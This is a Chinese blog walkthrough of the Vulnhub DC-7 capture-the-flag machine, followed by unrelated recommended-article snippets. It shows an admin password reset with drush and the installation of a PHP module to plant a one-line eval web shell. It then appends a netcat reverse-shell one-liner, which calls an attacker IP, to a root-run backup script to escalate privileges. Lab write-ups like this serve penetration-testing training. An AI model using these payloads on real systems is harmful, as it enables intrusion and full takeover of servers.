dc-7

最新推荐文章于 2024-07-25 23:51:24 发布
最新推荐文章于 2024-07-25 23:51:24 发布
阅读量246 收藏
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45875583/article/details/113731973
版权

dc-7

确定目标主机地址

在这里插入图片描述

扫描端口

在这里插入图片描述

开放80端口,访问

在这里插入图片描述

浏览器搜索@dc7user

在这里插入图片描述

打开第一个网页,打开员工数据库,打开config.php文件得到账号密码

在这里插入图片描述

ssh连接

在这里插入图片描述

查看邮件

在这里插入图片描述

查看可执行文件

在这里插入图片描述

发现脚本文件中drush命令可以更改密码,进入/var/www/html目录下更改

drush user-password admin --password="123456"

在这里插入图片描述

在这里插入图片描述

更改密码后登录web站点

在这里插入图片描述

添加新模块

在这里插入图片描述

输入url后install

https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

安装完成

编辑dc-7

在这里插入图片描述

在这里插入图片描述

写入一句话木马

GetShell
<?php
@eval($_REQUEST[666]);
?>

蚁剑连接之后,打开终端

在这里插入图片描述

在这里插入图片描述

查看可利用文件

在这里插入图片描述

查找,在/opt/scripts目录下

在这里插入图片描述

进入目录写入反弹shll代码,kali端监听

在这里插入图片描述

echo “rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.110.11 8888 >/tmp/f” >> backups.sh

提权成功!

高野01
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
DC-DC PCB layout 指导.docx
06-18
7. DC-DC Ton 和 Toff 时的电流路径都应该很短,减少阻抗和寄生电感。 8. 小信号是单点接地,距离比较远,免受大电流开关噪声的影响。 9. 在设计 DC-DC PCB 布局时,需要确保所有反馈连接短而直接,反馈电阻和补偿...
Vulnhub靶机实战——DC-7
冠霖L的博客
10-29 4872
靶机DC-7下载地址:https://download.vulnhub.com/dc/DC-7.zip 环境:VMware 15虚拟机软件 DC-7靶机IP地址:192.168.220.154 Kali的IP地址:192.168.220.155 DC-6靶机与kali都以NAT模式连接到网络,查看kali的IP地址:192.168.220.155...
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
DC-DC变换器Simulink仿真模型
08-07
**DC-DC变换器Simulink仿真模型** 在电子工程领域,DC-DC变换器是一种用于改变直流电压的装置,广泛应用于电源管理、电池供电设备、汽车电子系统以及各种嵌入式系统中。Simulink是MATLAB环境下的一个动态系统建模...
vuInhub靶场实战系列-DC-7实战
05-30
vuInhub靶场实战系列-DC-7实战
dc-vue:基于VueCli4.xx和DC-SDK构建的三维应用脚手架,用于开发三维WebGis项目
02-14
"dc-vue"是一个专为开发三维WebGIS项目的脚手架,它基于Vue CLI 4.x版本,并集成了DC-SDK。这个框架的目的是简化和加速开发者构建WebGIS应用程序的过程,使得用户能够更加高效地创建复杂的3D地理信息系统。 Vue CLI...
企业如何保证公司内网安全
shunyou0526的博客
07-25 319
部署防火墙和入侵检测系统:作为内网安全的第一道防线,防火墙和入侵检测系统能够有效阻止外部攻击和恶意软件的入侵。访问控制与身份验证:实施严格的访问控制策略,结合多因素认证(MFA),确保只有授权用户才能访问关键系统和数据。日志管理:建立全面的日志记录和审计机制,对所有数据访问、修改、删除等操作进行记录,以便于追踪和分析。电脑监控软件:使用电脑监控软件来监控员工的屏幕活动、上网行为等,防止内部威胁和不当使用公司资源。反病毒软件与反间谍软件:部署反病毒软件和反间谍软件等恶意软件防护工具,实时监测和清除恶意软件。
极速下载!青苹果系统Win7旗舰版:稳定安全
lihuiyun184291的博客
07-25 397
今天系统之家小编给大家带来了青苹果系统Win7旗舰版镜像,该版本系统离线制作而成,安全无病毒,还升级了防火墙功能,大家安装后时刻都能放心操作。同时,它是在保持原有的功能并适度优化,保留下来的功能轻松满足大家的使用需求,系统稳定性也很高,运作顺畅不卡顿。
微软蓝屏事件引发对构建更加稳固和安全的网络环境的思考
lupai的博客
07-24 479
综上所述,构建更加稳固和安全的网络环境需要政府、企业和用户共同努力,从政策、技术、用户行为等多个方面入手,形成全方位、多层次的网络安全防护体系。构建更加稳固和安全的网络环境是一个系统工程,需要从多个方面入手,包括政策、技术、用户行为等多个层面。建立完善的应急响应机制,制定应急预案和演练计划,提高应对网络攻击和突发事件的能力。鼓励和支持网络安全技术的研发和创新,推动新技术在网络安全领域的应用和推广。加强对用户的网络安全教育,提高用户的网络安全意识和防范能力。
网络战时代的国家安全:策略、技术和国际合作
2301_79955948的博客
07-24 1129
网络战时代的国家安全涉及到策略、技术和国际合作等多个方面。
HDShredder 7 企业版案例分享: 依照国际权威标准,安全清除企业数据
sanyuan7783的博客
07-24 1179
符合国际权威标准软件操作符合多种主流国际权威标准,包括 DoD 5200, BSI, VSITR, NCSC, NIST 及 GOST,支持擦除单个分区和区域,并可自由定制擦除模式。对于“Clear”清除级别,软件操作符合 ISO 27001, DIN 66399 以及 NIST SP 800-88R1要求。对于“Purge”级别,则使用 SecureErase 功能。安全擦除证书软件生成准确的安全清除证书,包括时间戳、序列号、以及清除过程的所有细节信息。远程擦除 - 使用 NetDisk 技术。
保障企业数据主权:安全可控的爬虫工具与管理平台
zhou6343178的博客
07-25 673
在数据驱动的时代,企业对数据的需求日益增长,但如何在保障数据主权的前提下高效采集数据?本文深入探讨了选择安全可控爬虫工具与管理平台的重要性,分析了关键特性,并提出实用建议,助力企业维护数据安全,实现数据价值最大化。
数据库安全:MySQL安全配置,MySQL安全基线检查加固
wangyuxiang946的博客
07-23 2253
MySQL基线检查,基线配置,安全加固
科普文:Linux系统安全加固指南
为无为,事无事,味无味。
07-25 859
本指南仅关注安全性和隐私性,而不关注性能,可用性或其他内容。列出的所有命令都将需要root特权。以“$”符号开头的单词表示一个变量,不同终端之间可能会有所不同。选择一个好的Linux发行版有很多因素。避免分发冻结程序包,因为它们在安全更新中通常很落后不使用与Systemd机制的发行版。Systemd包含许多不必要的攻击面;它尝试做的事情远远超出了必要,并且超出了初始化系统应做的事情。使用musl作为默认的C库。
后台管理系统登录安全和权限要求
JAVA领域优质创作者,基于分片网络查询方法专利发明者。
07-25 847
启用MFA后,系统将要求输入用户名和密码(第一安全要素),再进行输入来自其 MFA设备的动态验证码(第二安全要素),双因子的安全认证将为您的账户提供更高的安全保护。传统的用户名和密码认证容易受到破解、盗取或暴力破解等攻击方式的威胁,而双因子认证可以提供额外的安全层次,确保只有授权用户才能访问账户或系统。通过采用双因子认证,企业可以增加用户账号的安全性,降低身份盗窃和欺诈行为的风险,提高用户对系统的信任度。这在网络安全是极不安全的。订单管理:用于管理订单信息,包括查看订单、修改订单状态、发货、退货、退款等。
网站被浏览器提示“不安全”,如何解决
ABCDEFK1234的博客
07-24 412
网站被浏览器提示“不安全”,如何解决
气膜建筑的逃生通道设计与安全保障—轻空间
Skansi的博客
07-25 390
确保这类建筑的安全性,尤其是逃生通道的设计,是保障人员生命安全的关键。通过合理设计逃生通道、加强日常维护和应急演练,可以有效提升气膜建筑的安全性,保障人员的生命安全。定期组织应急疏散演练,提高人员逃生意识和技能,确保紧急情况下有序撤离。根据建筑面积和使用人数设计足够的逃生通道,确保人员能够迅速疏散。逃生通道应有清晰的标识和足够的照明,确保在紧急情况下易于找到。材料和结构应具备良好的防火性能,确保通道畅通无阻。逃生通道的宽度和高度应满足疏散需求,避免拥堵。安装应急照明设备和紧急广播系统,引导人员撤离。
基于微信小程序的校园警务系统/校园安全管理系统/校园出入管理系统
weixin_47958760的博客
07-25 1136
伴随着社会以及科学技术的发展,小程序已经渗透在人们的身边,小程序慢慢的变成了人们的生活必不可少的一部分,紧接着网络飞速的发展,小程序这一名词已不陌生,越来越多的学校机构等都会定制一款属于自己个性化的小程序。 本毕业设计的内容是设计并且实现一个基于微信小程序的校园警务系统。采用MYSQL为数据库开发平台,SSM框架,校园警务系统的功能已基本实现,主要学生、校园活动、奖助学金、心理健康、入校申请、出校申请、调查问卷、思想政治等。
企业产品网络安全建设日志0725
最新发布
KD的疯狂实验室
07-25 308
显然,这种说法是安全工作中的一个挑战。因为推动时间也蛮长了,做出了:只要升级一部分,易升级的组件即可。前天遇到的挑战是某后端部门排期出现问题,本应该做漏洞提升的时间被其他工作插入。测试团队需要进一步支持,因为组件升级,许可证升级以及后续的编码安全建立都是一串蚂蚱。基础的安全种子显然已经埋下。团队有人A提出,是否有必要按照某软件报的漏洞信息实施安全提升工作。我们的信息安全策略就是通过覆盖三防组件风险,降低我们产品自身的风险。特别是搬出来A之前在,其他企业的经验,即。安全宣讲和必要的沟通是无法回避的。
DC-DC转换器设计与应用手册
"DC-DC 设计指南,涵盖了高密度DC-DC转换器技术、控制引脚功能与应用、设计要求、电磁兼容性考虑、功率阵列中的电流共享、热性能信息、附件模块如Autoranging Rectifier Module (ARM)、Filter/Autoranging Rectifier...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值